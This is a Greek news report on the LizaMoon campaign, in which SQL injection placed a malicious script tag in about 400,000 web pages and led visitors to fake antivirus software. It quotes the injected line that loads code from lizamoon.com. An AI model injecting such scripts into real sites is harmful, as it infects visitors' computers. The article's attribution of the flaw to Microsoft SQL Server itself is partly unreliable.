Εταιρεία ασφάλειας υπολογιστών διαπίστωσε ότι σε περίπου 400.000 ιστοσελίδες έχει εισαχθεί κακόβουλο λογισμικό malicious software), με αποτέλεσμα οι χρήστες πληκτρολογώντας τη διεύθυνση που θέλουν δρομολογούνται σε άλλες παγιδευμένες ιστοσελίδες με «ψεύτικο» λογισμικό κατά των ιών.
Ο τρόπος που γίνεται αυτή η αυτόματη δρομολόγηση γίνεται λόγω ενός κενού ασφαλείας στο λογισμικό Microsoft SQL Server, το οποίο έχει η πλειονότητα των διαδικτυακών τόπων.
Κατά την περιήγηση των χρηστών σε κάποιο site, εμφανίζεται στην οθόνη μήνυμα που ειδοποιεί τους χρήστες ότι ο υπολογιστής τους έχει μολυνθεί από κάποιο ιό με το όνομα Windows Stability Center. Ο χρήστης από τη στιγμή που εγκαταστήσει το ψεύτικο αντιβιοτικό πρόγραμμα δίνει στην πραγματικότητα στους επίδοξους «χάκερ» πρόσβαση στον υπολογιστή τους.
Η τακτική που ακολουθείται από τους χάκερ ονομάζεται «επίθεση εισαγωγής SQL» (SQL injection attack). Αυτό που ακριβώς κάνουν είναι να εισάγουν μια γραμμή κώδικα «script src=http://lizamoon.com/ur.php» στους διακομιστές .
Η εταιρία που αντιλήφθηκε πρώτη το κενό ασφάλειας είναι η Websense από την Αμερική και ονόμασε την επίθεση αυτή «Lizamoon», λόγω του πρώτου δικτυακού τόπου που δρομολογούνται οι χρήστες. Από τη στιγμή που διαπιστώθηκε το πρόβλημα αυτό καταργήθηκε η ηλεκτρονική διεύθυνση αυτή, όμως στη θέση της έχουν ενεργοποιηθεί άλλες αντίστοιχες διευθύνσεις.
Αρχικά διαπιστώθηκε ότι από την έναρξη της επίθεσης, που φέρεται να είναι η 29η Μαρτίου, 28.000 δικτυακά site ήταν «μολυσμένα», ενώ μέχρι την Παρασκευή ο αριθμός αυτός των ιστοσελίδων έφτασε σχεδόν τις 400.000 ιστοσελίδες